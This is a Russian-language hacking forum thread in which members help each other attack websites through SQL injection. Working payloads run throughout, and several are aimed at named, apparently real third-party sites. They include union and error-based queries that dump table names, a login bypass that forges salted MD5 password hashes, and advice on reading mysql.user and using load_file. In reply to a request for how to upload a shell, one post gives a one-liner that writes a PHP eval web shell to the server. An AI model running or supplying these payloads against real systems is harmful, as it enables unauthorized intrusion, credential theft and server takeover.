Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    154
    Likes Received:
    18
    Reputations:
    9
    сегодня нашел сайтик:
    в mysql.user
    два пользователя root с разными хэшами...
    как такое возможно? просто 2 пасса у рута?
     
  2. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Ну тогда примерно понятно, чо.

    Знач так. Тащемта возмем за основу:
    asd' union select 'pass', 'salt', 1, '1
    /via кто-то там


    Значит там сравнивается с пассом который ты шлешь. да.

    Отсылать на скрипт будем пароль: "1"(без кавычек естественно)

    думаю что выглядет в коде это как-то так:
    PHP:
    <?php
    [...]
    $sql mysql_query('SELECT что-то там откуда-то там WHERE user_name = ' $_POST['login']) or die(mysql_error());
    $user mysql_fetch_assoc($sql);
    // алгоритм будем рассматривать стандартный. md5(md5($pass).$salt);
    //SELECT user_pass, user_salt, user_group, user_id FROM `users` WHERE user_name = 'asd''
    if( md5md5($_POST['pass']) . $user['user_salt'] )  == $user['user_pass']) {
        
    //все ок авторизируемся
        
    }else{
        
    //не авторизировался.
    }
    [...]
    ?>
    Наш пароль: 1
    "Наша" соль: 2

    При авторизации пробуй слать:
    Code:
    Логин: asd' and 1=2 union select MD5(CONCAT(MD5(1), 2)) , 2, 1, 1 --  
    Пасс: 1
    
    Или

    Code:
    //md5(md5(pass).md5(salt))
    Логин: asd' and 1=2 union select MD5(CONCAT(MD5(1), MD5(2))) , 2, 1, 1 --  
    Пасс: 1
    
    И так далее по алгоритмам.

    Отчет ждем в тему :)
     
  3. M1lten

    M1lten New Member

    Joined:
    18 Dec 2010
    Messages:
    35
    Likes Received:
    0
    Reputations:
    0
    Boolean, при запросах такова вида, выскакивает ошибка мускуля, а форма авторизации говорит что не верный пароль. И кстати, мб, пароль не шифруется, т.к. он даже в куках передается в открытом виде :(
     
  4. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,588
    Likes Received:
    406
    Reputations:
    196
    ты все варианты засолки то хоть перепробовал как тебе посоветовали?
    Тем не менее, дай ссыль чтоль.
     
    1 person likes this.
  5. crackforme

    crackforme New Member

    Joined:
    3 Oct 2011
    Messages:
    208
    Likes Received:
    1
    Reputations:
    0
    Сорри за нубство мужики
    Такой вопрос

    1,2,..group_concat(login)...
    ...concat_ws(login)...

    не хочет выполнять как можно обойти фильтр?

    пробовал
    group_concat(CHAR(108,111,103,105,110))

    тоже не работает
     
    #18125 crackforme, 25 Oct 2011
    Last edited: 25 Oct 2011
  6. M1lten

    M1lten New Member

    Joined:
    18 Dec 2010
    Messages:
    35
    Likes Received:
    0
    Reputations:
    0
    Вот, при таком запросе нет ошибки мускуля, и скрипт говорит что неверный пароль:

    login = asd
    pass = 1

    И при таком тоже ошибка пропадает и неверный пароль
    Если не получится, скину.
     
    #18126 M1lten, 25 Oct 2011
    Last edited: 25 Oct 2011
  7. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    http://www.mysql.ru/docs/maryan/#concat_ws
    http://webi.ru/webi_articles/8_14_f.html
    + советую к прочтению http://raz0r.name/obzory/group_concat/
     
  8. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    154
    Likes Received:
    18
    Reputations:
    9
    site/news.php?id=18 and 1=1 (true)
    site/news.php?id=6+AND+ascii(lower(substring(user(),1,1)))=111 (true)
    site/news.php?id=18 and 1=3 (false)
    site/news.php?id=18 and 'a'='a'

    в чем суть ошибки? mq вроде бы off
     
    #18128 vaddd, 25 Oct 2011
    Last edited: 25 Oct 2011
  9. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    Народ, а чё я делоаю не правильно?
    http://english.in.ua/study.php?id=7+or+1+group+by+concat%28%28select+table_name+from+information_schema.tables%29,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+

    чего мне не показывает таблицы?
     
  10. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    403
    Likes Received:
    40
    Reputations:
    23
    Code:
    http://english.in.ua/study.php?id=7/**/and/**/row(1,2)in(select/**/count(*),concat((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),0x3a,floor(rand(0)*2))as/**/a/**/from/**/information_schema.tables/**/x/**/group/**/by/**/a)
     
    #18130 er9j6@, 25 Oct 2011
    Last edited by a moderator: 26 Oct 2011
    1 person likes this.
  11. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    507
    Likes Received:
    105
    Reputations:
    53
    на самом то деле причина просто в
    д а какая разница то? Юзай hex формат. А вообще можешь кинуть линк в пм, если просто интересно.

    To, M1lten
    Может банально идёт сверка $_REQUSET['login'] == $sql_resp['login']
    $_REQUSET['login'] = sdf' sqlinj, а $sql_resp['login'] = выводимое тобою значение. Залогиниться возможно, когда идёт проверка на кол-во строк, которое вернулось после ввода. Может вообще два запроса на проверку логина и пароля, д дофига чего может быть и скуль не провести. Если ошибка от мускуля, то юзай error-based sqlinj
     
    #18131 Melfis, 25 Oct 2011
    Last edited: 25 Oct 2011
    1 person likes this.
  12. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    608
    Reputations:
    1,101
    1. from mysql.user идёт до into dumpfile. Далее может идти только комментарий.

    Либо ищем раскрытие путей на сайте, либо читаем через load_file каталоги и ищем полный путь к сайту, хотя возможно прав на папки не бует.

    В этом случае Можно будет попробовать посмотреть директории, которые могут быть выведены с сервера, но находящийся в этом каталоге и доп. Файлы, которые можно прочитать или создать нужный файл
    А разве это нужные функции, при раскрутке SQL-inj? Если фильтр идёт на них можно будет обойтись и без их использования.
     
  13. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    Есть доступ в phpmyadmin
    Версия MySQL 5.5.9 как залить шелл?
    Какие запросы?
     
  14. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    792
    Likes Received:
    349
    Reputations:
    120
    select '<?php eval($_GET[ololo]); ?>' into outfile 'абсолютный_путь_до_папки_с_правами_на_запись/shell.php'
     
    1 person likes this.
  15. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    Подскажите почему не выводит названия таблиц
    http://goldsauna.ru/articles.html?id=-7%27+union+select+1,2,table_name,4,5+from+information_schema.tables%27
     
  16. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    http://goldsauna.ru/articles.html?id=-7'+union+select+1,2,unhex(hex(table_name)),4,5+from+information_schema.tables--+
     
    _________________________
  17. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    135
    Likes Received:
    41
    Reputations:
    26
    да и без hex и anhex все норм выводит...
    http://goldsauna.ru/articles.html?id=-7'+union+select+1,2,table_name,4,5+from+information_schema.tables--+
     
  18. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    Народ, а как ваше можно найти полный путь к файлу на хостинге?
     
  19. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    792
    Likes Received:
    349
    Reputations:
    120
    http://forum.antichat.ru/showthread.php?t=30632
     
    1 person likes this.
  20. root47

    root47 New Member

    Joined:
    2 Oct 2011
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    http://cod.gamepolis.ru/xlrstats/index.php?func=player&playerid=1 можно ли раскрутить sql in?Если да то как?
     
Loading...
Thread Status:
Not open for further replies.